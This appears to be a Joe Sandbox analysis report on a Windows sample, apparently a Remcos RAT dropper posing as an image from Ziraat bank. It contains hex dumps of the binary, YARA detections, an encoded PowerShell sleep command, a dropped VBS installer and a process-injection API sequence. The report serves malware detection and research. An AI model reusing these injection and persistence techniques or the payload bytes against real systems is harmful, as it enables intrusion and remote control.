                                                                                                                            2022-10-03 14:03:32 UTC3495INData Raw: 30 30 38 36 30 30 36 43 30 44 45 41 32 30 35 38 30 42 41 38 42 41 30 31 30 30 30 30 30 30 38 36 30 30 36 43 30 44 45 33 32 30 35 38 30 42 42 43 42 41 30 31 30 30 30 30 30 30 43 36 30 38 30 31 31 32 37 42 30 30 35 39 30 42 43 34 42 41 30 31 30 30 30 30 30 30 43 36 30 38 30 31 31 32 37 46 30 30 35 39 30 42 46 34 42 41 30 31 30 30 30 30 30 30 43 36 30 30 30 31 31 32 38 41 30 30 35 41 30 42 33 30 42 44 30 31 30 30 30 30 30 30 43 36 30 30 30 31 31 32 38 34 30 30 35 42 30 42 34 43 42 44 30 31 30 30 30 30 30 30 38 36 31 38 43 39 31 31 31 37 30 30 35 42 30 42 35 34 42 44 30 31 30 30 30 30 30 30 39 33 30 30 36 43 30 44 41 34 30 39 35 42 30 42 30 30 30 30 30 30 30 30 30 33 30 30 38 36 31 38 43 39 31 31 41 32 30 35 35 43 30 42 30 30 30 30 30 30 30 30 30 33 30 30 43
                                                                                                                            Data Ascii: 0086006C0DEA20580BA8BA0100000086006C0DE320580BBCBA01000000C60801127B00590BC4BA01000000C60801127F00590BF4BA01000000C60001128A005A0B30BD01000000C600011284005B0B4CBD010000008618C91117005B0B54BD0100000093006C0DA4095B0B0000000003008618C911A2055C0B000000000300C
                                                                                                                            2022-10-03 14:03:32 UTC3511INData Raw: 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30
                                                                                                                            Data Ascii: 0001006C0D000002008D0D00000300940D000001006C0D000001006C0D000002008D0D000001006C0D000001006C0D000002008D0D000001006C0D000002008D0D00000300940D000001006C0D000002008D0D00000300940D000001006C0D000002008D0D00000300940D000001006C0D000002008D0D00000300940D00000
                                                                                                                            2022-10-03 14:03:32 UTC3527INData Raw: 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 34 30 30 41 32 30 44 30 30 30 30 30 31 30 30 36 43 30 44 31 30 31 30 30 32 30 30 38 44 30 44 31 30 31 30 30 33 30 30 39 34 30 44 31 30 31 30 30 34 30 30 41 32 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 31 30 30 36 43 30 44 30 30 30 30 30 32 30 30 38 44 30 44 30 30 30 30 30 33 30 30 39 34 30 44 30 30 30 30 30 31 30 30 36
                                                                                                                            Data Ascii: 008D0D00000300940D00000400A20D000001006C0D101002008D0D10100300940D10100400A20D000001006C0D000001006C0D000001006C0D000002008D0D00000300940D000001006C0D000001006C0D000002008D0D00000300940D000001006C0D000001006C0D000001006C0D000002008D0D00000300940D000001006
                                                                                                                            2022-10-03 14:03:32 UTC3543INData Raw: 32 32 30 30 30 31 30 30 30 30 31 42 30 30 35 39 31 39 30 39 30 31 30 30 30 30 34 33 30 30 31 45 32 32 32 30 30 31 30 30 30 30 31 42 30 30 35 39 31 39 32 39 30 31 30 30 30 30 34 33 30 30 35 38 32 32 34 39 30 31 30 30 30 30 34 33 30 30 37 34 32 32 36 39 30 31 30 30 30 30 34 33 30 30 38 46 32 32 38 39 30 31 30 30 30 30 34 33 30 30 41 35 32 32 41 39 30 31 30 30 30 30 34 33 30 30 42 42 32 32 43 39 30 31 30 30 30 30 34 33 30 30 44 31 32 32 45 39 30 31 30 30 30 30 34 33 30 30 45 38 32 32 30 39 30 32 30 30 30 30 34 33 30 30 46 46 32 32 32 39 30 32 30 30 30 30 34 33 30 30 31 36 32 33 34 39 30 32 30 30 30 30 34 33 30 30 33 33 32 33 36 39 30 32 30 30 30 30 34 33 30 30 34 41 32 33 38 39 30 32 30 30 30 30 34 33 30 30 36 31 32 33 41 39 30 32 30 30 30 30 34 33 30 30 37
                                                                                                                            Data Ascii: 22000100001B0059190901000043001E22200100001B005919290100004300582249010000430074226901000043008F22890100004300A522A90100004300BB22C90100004300D122E90100004300E822090200004300FF22290200004300162349020000430033236902000043004A238902000043006123A902000043007
                                                                                                                            2022-10-03 14:03:32 UTC3559INData Raw: 36 46 36 43 36 35 30 30 35 33 37 39 37 33 37 34 36 35 36 44 32 45 35 33 36 35 36 33 37 35 37 32 36 39 37 34 37 39 32 45 35 30 37 32 36 39 36 45 36 33 36 39 37 30 36 31 36 43 30 30 35 37 36 39 36 45 36 34 36 46 37 37 37 33 34 39 36 34 36 35 36 45 37 34 36 39 37 34 37 39 30 30 35 37 36 39 36 45 36 34 36 46 37 37 37 33 35 30 37 32 36 39 36 45 36 33 36 39 37 30 36 31 36 43 30 30 35 33 36 35 36 33 37 35 37 32 36 35 35 33 37 34 37 32 36 39 36 45 36 37 30 30 35 33 36 35 36 33 37 35 37 32 36 39 37 34 37 39 34 33 37 32 36 39 37 34 36 39 36 33 36 31 36 43 34 31 37 34 37 34 37 32 36 39 36 32 37 35 37 34 36 35 30 30 35 33 36 35 36 33 37 35 37 32 36 39 37 34 37 39 34 35 37 38 36 33 36 35 37 30 37 34 36 39 36 46 36 45 30 30 35 35 36 45 37 36 36 35 37 32 36 39 36 36 36
                                                                                                                            Data Ascii: 6F6C650053797374656D2E53656375726974792E5072696E636970616C0057696E646F77734964656E746974790057696E646F77735072696E636970616C00536563757265537472696E67005365637572697479437269746963616C417474726962757465005365637572697479457863657074696F6E00556E76657269666
                                                                                                                            2022-10-03 14:03:32 UTC3575INData Raw: 37 34 36 39 36 46 36 45 35 33 36 33 36 46 37 30 36 35 34 33 36 31 36 43 36 43 36 32 36 31 36 33 36 42 37 33 34 45 36 46 37 34 35 33 36 35 37 34 30 30 35 34 37 32 36 31 36 45 37 33 36 31 36 33 37 34 36 39 36 46 36 45 35 32 36 35 37 31 37 35 36 39 37 32 36 35 36 34 35 30 37 32 36 46 36 44 36 46 37 34 36 39 36 46 36 45 30 30 34 33 36 31 36 45 36 45 36 46 37 34 34 35 37 38 36 35 36 33 37 35 37 34 36 35 34 36 36 39 36 43 36 35 34 39 36 45 35 34 37 32 36 31 36 45 37 33 36 31 36 33 37 34 36 39 36 46 36 45 30 30 35 34 37 32 36 31 36 45 37 33 36 31 36 33 37 34 36 39 36 46 36 45 37 33 34 45 36 46 37 34 34 36 37 32 36 46 37 41 36 35 36 45 30 30 34 44 36 31 37 38 36 39 36 44 37 35 36 44 34 45 37 34 35 33 37 34 36 31 37 34 37 35 37 33 30 30 45 45 38 30 38 30 30 30 45
                                                                                                                            Data Ascii: 74696F6E53636F706543616C6C6261636B734E6F74536574005472616E73616374696F6E526571756972656450726F6D6F74696F6E0043616E6E6F744578656375746546696C65496E5472616E73616374696F6E005472616E73616374696F6E734E6F7446726F7A656E004D6178696D756D4E7453746174757300EE808000E
                                                                                                                            2022-10-03 14:03:32 UTC3591INData Raw: 31 43 31 30 31 31 38 34 32 30 30 44 30 30 30 36 31 31 38 34 43 43 31 38 31 30 31 38 31 38 31 30 31 38 30 39 30 39 30 42 30 30 30 35 31 31 38 34 43 43 31 38 31 38 31 38 30 39 31 30 30 39 30 44 30 30 30 35 31 31 38 34 43 43 31 38 31 30 31 38 31 30 31 38 30 39 31 30 30 39 31 33 30 30 30 42 31 31 38 34 43 43 31 30 31 38 31 31 38 31 35 43 31 38 31 38 31 38 31 38 30 32 30 38 30 38 30 38 31 38 30 38 30 30 30 33 31 31 38 34 43 43 31 38 30 32 30 39 30 42 30 30 30 34 31 31 38 34 43 43 31 38 31 30 31 38 31 30 31 38 30 39 31 30 30 30 30 35 31 31 38 34 43 43 31 38 31 31 38 34 44 38 31 30 31 31 38 34 44 34 30 39 31 30 30 39 30 38 30 30 30 32 31 31 38 34 43 43 31 38 31 30 30 39 31 32 30 30 30 34 31 31 38 34 43 43 31 30 31 38 31 31 38 31 34 38 31 30 31 31 38 34 31 43 31
                                                                                                                            Data Ascii: 1C101184200D00061184CC18101818101809090B00051184CC1818180910090D00051184CC181018101809100913000B1184CC101811815C1818181802080808180800031184CC1802090B00041184CC1810181018091000051184CC181184D8101184D40910090800021184CC1810091200041184CC10181181481011841C1
                                                                                                                            2022-10-03 14:03:32 UTC3607INData Raw: 31 44 30 33 30 37 30 37 30 33 30 38 30 32 31 32 38 33 35 30 31 30 30 37 30 36 31 32 37 38 31 44 30 35 31 32 38 30 46 30 31 32 38 33 38 34 31 32 38 32 36 43 30 41 31 34 30 37 30 39 31 32 38 33 45 34 30 38 31 32 38 32 44 43 31 32 38 34 37 30 31 32 38 32 38 34 30 38 31 32 33 31 31 38 31 39 30 38 30 30 30 32 31 32 33 31 31 32 38 32 42 39 30 38 30 39 30 37 30 31 31 35 31 32 36 44 30 31 31 32 38 30 46 30 30 33 30 37 30 31 31 43 30 45 32 30 30 34 31 43 31 31 38 31 37 44 31 32 38 31 37 39 31 44 31 43 31 32 38 30 43 35 30 36 30 37 30 33 31 43 30 41 31 32 33 31 30 37 32 30 30 32 30 31 31 31 38 31 39 39 30 34 30 37 32 30 30 32 30 31 31 31 38 31 39 39 30 38 32 45 30 37 31 34 31 32 38 31 33 30 30 38 31 32 38 33 45 34 30 38 30 38 30 38 30 38 31 44 31 43 31 32 38 30 38
                                                                                                                            Data Ascii: 1D03070703080212835010070612781D051280F012838412826C0A1407091283E4081282DC128470128284081231181908000212311282B90809070115126D011280F00307011C0E20041C11817D1281791D1C1280C50607031C0A1231072002011181990407200201118199082E0714128130081283E4080808081D1C12808
                                                                                                                            2022-10-03 14:03:32 UTC3623INData Raw: 36 32 30 30 33 30 30 30 33 37 30 30 33 38 30 30 36 32 30 30 33 37 30 30 33 35 30 30 36 32 30 30 33 33 30 30 30 30 31 35 37 30 30 30 36 31 30 30 37 32 30 30 36 31 30 30 36 44 30 30 36 35 30 30 37 34 30 30 36 35 30 30 37 32 30 30 37 33 30 30 30 30 34 46 34 44 30 30 36 39 30 30 36 33 30 30 37 32 30 30 36 46 30 30 37 33 30 30 36 46 30 30 36 36 30 30 37 34 30 30 32 30 30 30 35 33 30 30 36 46 30 30 36 36 30 30 37 34 30 30 37 37 30 30 36 31 30 30 37 32 30 30 36 35 30 30 32 30 30 30 34 42 30 30 36 35 30 30 37 39 30 30 32 30 30 30 35 33 30 30 37 34 30 30 36 46 30 30 37 32 30 30 36 31 30 30 36 37 30 30 36 35 30 30 32 30 30 30 35 30 30 30 37 32 30 30 36 46 30 30 37 36 30 30 36 39 30 30 36 34 30 30 36 35 30 30 37 32 30 30 30 30 31 42 35 32 30 30 35 33 30 30 34 31 30
                                                                                                                            Data Ascii: 620030003700380062003700350062003300001570006100720061006D0065007400650072007300004F4D006900630072006F0073006F0066007400200053006F0066007400770061007200650020004B00650079002000530074006F0072006100670065002000500072006F0076006900640065007200001B52005300410


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:16:01:56
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            Imagebase:0xca0000
                                                                                                                            File size:6656 bytes
                                                                                                                            MD5 hash:3B4A0B66D0415AF1E216224497C59B4B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.424695583.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.416884855.0000000002F97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.405974896.000000000437D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:1
                                                                                                                            Start time:16:02:08
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                                                                                                                            Imagebase:0xd60000
                                                                                                                            File size:430592 bytes
                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:16:02:09
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff745070000
                                                                                                                            File size:625664 bytes
                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:12
                                                                                                                            Start time:16:03:11
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\Desktop\IMG-ZIRAATI03102022.exe
                                                                                                                            Imagebase:0x910000
                                                                                                                            File size:6656 bytes
                                                                                                                            MD5 hash:3B4A0B66D0415AF1E216224497C59B4B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:13
                                                                                                                            Start time:16:03:14
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                                                                                                                            Imagebase:0x9e0000
                                                                                                                            File size:147456 bytes
                                                                                                                            MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:16:03:28
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Users\user\AppData\Roaming\FILE.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\FILE.exe"
                                                                                                                            Imagebase:0x9c0000
                                                                                                                            File size:6656 bytes
                                                                                                                            MD5 hash:3B4A0B66D0415AF1E216224497C59B4B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.605296187.0000000002D87000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 26%, ReversingLabs
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:18
                                                                                                                            Start time:16:03:45
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                                                                                                                            Imagebase:0xd60000
                                                                                                                            File size:430592 bytes
                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:19
                                                                                                                            Start time:16:03:45
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff745070000
                                                                                                                            File size:625664 bytes
                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:23
                                                                                                                            Start time:16:04:41
                                                                                                                            Start date:03/10/2022
                                                                                                                            Path:C:\Users\user\AppData\Roaming\FILE.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\FILE.exe
                                                                                                                            Imagebase:0xd90000
                                                                                                                            File size:6656 bytes
                                                                                                                            MD5 hash:3B4A0B66D0415AF1E216224497C59B4B
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.773154547.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:16.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:303
                                                                                                                              Total number of Limit Nodes:11
                                                                                                                              execution_graph 18230 6113110 18231 6113127 18230->18231 18236 60644c2 18231->18236 18243 60645d0 18231->18243 18250 60647d0 18231->18250 18232 611316b 18238 60644e2 18236->18238 18237 606455c 18237->18232 18238->18237 18256 6067066 18238->18256 18261 6066fc8 18238->18261 18266 6066f77 18238->18266 18239 606493d 18239->18239 18245 60645ee 18243->18245 18244 6064620 18244->18232 18245->18244 18247 6067066 6 API calls 18245->18247 18248 6066f77 6 API calls 18245->18248 18249 6066fc8 6 API calls 18245->18249 18246 606493d 18246->18246 18247->18246 18248->18246 18249->18246 18255 60647f8 18250->18255 18251 606493d 18251->18251 18252 6067066 6 API calls 18252->18251 18253 6066f77 6 API calls 18253->18251 18254 6066fc8 6 API calls 18254->18251 18255->18252 18255->18253 18255->18254 18258 6066fee 18256->18258 18257 6067064 18257->18239 18258->18257 18272 60670aa 18258->18272 18277 60670b8 18258->18277 18263 6066fee 18261->18263 18262 6067064 18262->18239 18263->18262 18264 60670aa 6 API calls 18263->18264 18265 60670b8 6 API calls 18263->18265 18264->18263 18265->18263 18267 6066f8f 18266->18267 18269 6066f98 18266->18269 18267->18239 18268 6067064 18268->18239 18269->18268 18270 60670aa 6 API calls 18269->18270 18271 60670b8 6 API calls 18269->18271 18270->18269 18271->18269 18273 60670da 18272->18273 18274 6067112 18273->18274 18282 606a800 18273->18282 18289 606a7f9 18273->18289 18274->18258 18278 60670da 18277->18278 18279 6067112 18278->18279 18280 606a800 6 API calls 18278->18280 18281 606a7f9 6 API calls 18278->18281 18279->18258 18280->18279 18281->18279 18283 606a80a 18282->18283 18296 6067848 18283->18296 18286 606a83a 18286->18274 18290 606a80a 18289->18290 18291 6067848 6 API calls 18290->18291 18292 606a82e 18291->18292 18293 606a83a 18292->18293 18294 606a850 6 API calls 18292->18294 18295 606a84d 6 API calls 18292->18295 18293->18274 18294->18293 18295->18293 18297 606785a 18296->18297 18315 6067878 18297->18315 18319 6067888 18297->18319 18298 6067865 18298->18286 18301 606a850 18298->18301 18308 606a84d 18298->18308 18302 606a877 18301->18302 18305 606aa24 18302->18305 18330 606b280 18302->18330 18337 606b290 18302->18337 18303 606ab03 18303->18305 18344 6067d08 18303->18344 18309 606a877 18308->18309 18312 606aa24 18309->18312 18313 606b280 6 API calls 18309->18313 18314 606b290 6 API calls 18309->18314 18310 606ab03 18311 6067d08 6 API calls 18310->18311 18310->18312 18311->18312 18313->18310 18314->18310 18316 60678b7 18315->18316 18317 60678d6 18316->18317 18323 6112df8 18316->18323 18320 60678b7 18319->18320 18321 60678d6 18320->18321 18322 6112df8 6 API calls 18320->18322 18322->18321 18325 6112e2a 18323->18325 18324 6112f20 18324->18317 18325->18324 18327 60644c2 6 API calls 18325->18327 18328 60647d0 6 API calls 18325->18328 18329 60645d0 6 API calls 18325->18329 18326 6113039 18326->18317 18327->18326 18328->18326 18329->18326 18331 606b294 18330->18331 18332 606b2a5 18331->18332 18350 6060040 18331->18350 18332->18303 18334 606b3e8 18335 60647d0 6 API calls 18334->18335 18336 606b3f7 18335->18336 18336->18303 18339 606b2a1 18337->18339 18338 606b2a5 18338->18303 18339->18338 18340 6060040 6 API calls 18339->18340 18341 606b3e8 18340->18341 18342 60647d0 6 API calls 18341->18342 18343 606b3f7 18342->18343 18343->18303 18346 6067d35 18344->18346 18345 6067d40 18345->18305 18346->18345 18368 60f1d3b 18346->18368 18376 60f1f02 18346->18376 18381 60f1bd2 18346->18381 18351 6060068 18350->18351 18355 60642e0 18351->18355 18359 60642e8 18351->18359 18352 6060144 18356 60642f9 18355->18356 18363 6064320 18356->18363 18357 6064316 18357->18352 18360 60642f9 18359->18360 18362 6064320 6 API calls 18360->18362 18361 6064316 18361->18352 18362->18361 18364 606433f 18363->18364 18366 60644c2 6 API calls 18364->18366 18367 6064357 18364->18367 18365 606446c 18365->18357 18366->18365 18367->18357 18369 60f1d3c 18368->18369 18371 60f1e91 18369->18371 18392 12216c3 18369->18392 18396 12216c8 18369->18396 18370 60f204b 18371->18370 18400 12210e0 18371->18400 18404 1220e1d 18371->18404 18377 60f1f03 18376->18377 18378 60f204b 18377->18378 18379 12210e0 WriteProcessMemory 18377->18379 18380 1220e1d WriteProcessMemory 18377->18380 18379->18378 18380->18378 18382 60f1be8 18381->18382 18384 60f1c9f 18382->18384 18408 1221288 18382->18408 18412 122127c 18382->18412 18383 60f204b 18385 60f1e91 18384->18385 18388 12216c3 ReadProcessMemory 18384->18388 18389 12216c8 ReadProcessMemory 18384->18389 18385->18383 18390 12210e0 WriteProcessMemory 18385->18390 18391 1220e1d WriteProcessMemory 18385->18391 18388->18385 18389->18385 18390->18383 18391->18383 18393 12216c8 ReadProcessMemory 18392->18393 18395 1221757 18393->18395 18395->18371 18397 1221713 ReadProcessMemory 18396->18397 18399 1221757 18397->18399 18399->18371 18401 1221128 WriteProcessMemory 18400->18401 18403 122117f 18401->18403 18403->18370 18405 12210e0 WriteProcessMemory 18404->18405 18407 122117f 18405->18407 18407->18370 18409 1221311 18408->18409 18409->18409 18410 1221476 CreateProcessA 18409->18410 18411 12214d3 18410->18411 18413 1221311 18412->18413 18413->18413 18414 1221476 CreateProcessA 18413->18414 18415 12214d3 18414->18415 18530 6110b30 18531 6110b49 18530->18531 18538 606016f 18531->18538 18533 6110b9a 18535 60644c2 6 API calls 18535->18533 18536 60647d0 6 API calls 18536->18533 18537 60645d0 6 API calls 18537->18533 18541 6064320 6 API calls 18538->18541 18542 6064400 18538->18542 18539 6060178 18539->18535 18539->18536 18539->18537 18541->18539 18543 6064418 18542->18543 18545 60644c2 6 API calls 18543->18545 18544 606446c 18544->18539 18545->18544 18416 1220c20 18417 1220c60 VirtualAllocEx 18416->18417 18419 1220c9d 18417->18419 18546 1220400 18547 1220413 18546->18547 18550 6065af8 6 API calls 18547->18550 18551 6065af6 18547->18551 18548 1220431 18550->18548 18552 6065b09 18551->18552 18553 6060040 6 API calls 18552->18553 18554 6065b19 18553->18554 18555 60647d0 6 API calls 18554->18555 18556 6065b29 18555->18556 18556->18548 18557 606bc20 18558 606bc30 18557->18558 18559 6067848 6 API calls 18558->18559 18562 606bc53 18559->18562 18560 606a850 6 API calls 18561 606bcf4 18560->18561 18562->18560 18563 606e0e0 18565 606e0ef 18563->18565 18568 606e106 18563->18568 18564 606e199 18566 60647d0 6 API calls 18564->18566 18567 606e1a9 18566->18567 18568->18564 18569 6060040 6 API calls 18568->18569 18569->18564 18426 1220a28 18427 1220a68 ResumeThread 18426->18427 18429 1220a99 18427->18429 18570 1220b48 18571 1220b8d SetThreadContext 18570->18571 18573 1220bd5 18571->18573 18574 1220448 18575 122046a 18574->18575 18577 60644c2 6 API calls 18575->18577 18578 60647d0 6 API calls 18575->18578 18579 60645d0 6 API calls 18575->18579 18576 1220508 18577->18576 18578->18576 18579->18576 18430 606bb4a 18431 606bb6a 18430->18431 18435 606bb78 18431->18435 18441 606bb88 18431->18441 18432 606bb72 18436 606bb9f 18435->18436 18437 6060040 6 API calls 18436->18437 18438 606bbd4 18437->18438 18439 60647d0 6 API calls 18438->18439 18440 606bbe3 18439->18440 18440->18432 18442 606bb9f 18441->18442 18443 6060040 6 API calls 18442->18443 18444 606bbd4 18443->18444 18445 60647d0 6 API calls 18444->18445 18446 606bbe3 18445->18446 18446->18432 18586 1222290 18588 12222ae 18586->18588 18587 12222f0 18588->18587 18590 611d320 18588->18590 18591 611d356 18590->18591 18592 611d32d 18590->18592 18591->18588 18592->18591 18595 1222333 18592->18595 18607 1222348 18592->18607 18596 122233a 18595->18596 18597 1222391 RtlDecodePointer 18596->18597 18598 12225b3 18596->18598 18599 12223c5 18597->18599 18600 12223cc RtlDecodePointer 18597->18600 18598->18591 18599->18600 18606 122240a 18600->18606 18601 1222443 RtlEncodePointer 18601->18606 18602 122248f RtlDecodePointer 18603 12224c6 RtlEncodePointer 18602->18603 18602->18606 18603->18606 18604 1222511 RtlDecodePointer 18605 122254c RtlDecodePointer 18604->18605 18604->18606 18605->18606 18606->18598 18606->18601 18606->18602 18606->18603 18606->18604 18606->18605 18608 1222357 18607->18608 18609 1222391 RtlDecodePointer 18608->18609 